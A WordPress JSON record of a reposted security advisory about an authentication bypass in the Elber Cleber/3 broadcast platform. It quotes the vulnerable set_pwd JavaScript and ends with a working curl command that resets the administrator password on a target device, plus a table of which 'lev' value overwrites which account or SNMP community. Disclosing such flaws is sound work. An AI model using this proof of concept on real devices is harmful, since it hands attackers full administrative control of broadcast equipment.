{"id":56347,"date":"2024-04-18T20:20:39","date_gmt":"2024-04-18T16:20:39","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178136\/ZSL-2024-5816.txt"},"modified":"2024-04-18T20:20:39","modified_gmt":"2024-04-18T16:20:39","slug":"elber-cleber-3-broadcast-multi-purpose-platform-1-0-0-authentication-bypass","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/elber-cleber-3-broadcast-multi-purpose-platform-1-0-0-authentication-bypass\/","title":{"rendered":"Elber Cleber\/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass"},"content":{"rendered":"<p>Elber Cleber\/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass<\/p>\n<p>Vendor: Elber S.r.l.<br \/>Product web page: https:\/\/www.elber.it<br \/>Affected version: 1.0.0 Revision 7304<br \/>1.0.0 Revision 7284<br \/>1.0.0 Revision 6505<br \/>1.0.0 Revision 6332<br \/>1.0.0 Revision 6258<br \/>XS2DAB v1.50 rev 6267<\/p>\n<p>Summary: Cleber offers a powerful, flexible and modular hardware and<br \/>software platform for broadcasting and contribution networks where<br \/>customers can install up to six boards with no limitations in terms<br \/>of position or number. Based on a Linux embedded OS, it detects the<br \/>presence of the boards and shows the related control interface to the<br \/>user, either through web GUI and Touchscreen TFT display. Power supply<br \/>can be single (AC and\/or DC) or dual (hot swappable for redundancy);<br \/>customer may chose between two ranges for DC sources, that is 22-65<br \/>or 10-36 Vdc for site or DSNG applications.<\/p>\n<p>Desc: The device suffers from an authentication bypass vulnerability through<br \/>a direct and unauthorized access to the password management functionality. The<br \/>issue allows attackers to bypass authentication by manipulating the set_pwd<br \/>endpoint that enables them to overwrite the password of any user within the<br \/>system. This grants unauthorized and administrative access to protected areas<br \/>of the application compromising the device&#8217;s system security.<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\/modules\/pwd.html<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>50: function apply_pwd(level, pwd)<br \/>51: {<br \/>52: $.get(&#8220;json_data\/set_pwd&#8221;, {lev:level, pass:pwd},<br \/>53: function(data){<br \/>54: \/\/$.alert({title:&#8217;Operation&#8217;,text:data});<br \/>55: show_message(data);<br \/>56: }).fail(function(error){<br \/>57: show_message(&#8216;Error &#8216; + error.status, &#8216;error&#8217;);<br \/>58: });<br \/>59: }<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>Tested on: NBFM Controller<br \/>embOS\/IP<\/p>\n<p>Vulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic<br \/>@zeroscience<\/p>\n<p>Advisory ID: ZSL-2024-5816<br \/>Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5816.php<\/p>\n<p>18.08.2023<\/p>\n<p>&#8212;<\/p>\n<p>$ curl -s http:\/\/[TARGET]\/json_data\/set_pwd?lev=2&amp;pass=admin1234<\/p>\n<p>Ref (lev param):<\/p>\n<p>Level 7 = SNMP Write Community (snmp_write_pwd)<br \/>Level 6 = SNMP Read Community (snmp_read_pwd)<br \/>Level 5 = Custom Password? hidden. (custom_pwd)<br \/>Level 4 = Display Password (display_pwd)?<br \/>Level 2 = Administrator Password (admin_pwd)<br \/>Level 1 = Super User Password (puser_pwd)<br \/>Level 0 = User Password (user_pwd)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Elber Cleber\/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass Vendor: Elber S.r.l.Product web page: https:\/\/www.elber.itAffected version: 1.0.0 Revision 73041.0.0 Revision 72841.0.0 Revision 65051.0.0 Revision 63321.0.0 Revision 6258XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware andsoftware platform for broadcasting and contribution networks wherecustomers can install up to six boards with no limitations &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56347","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56347","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56347"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56347\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56347"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56347"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56347"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}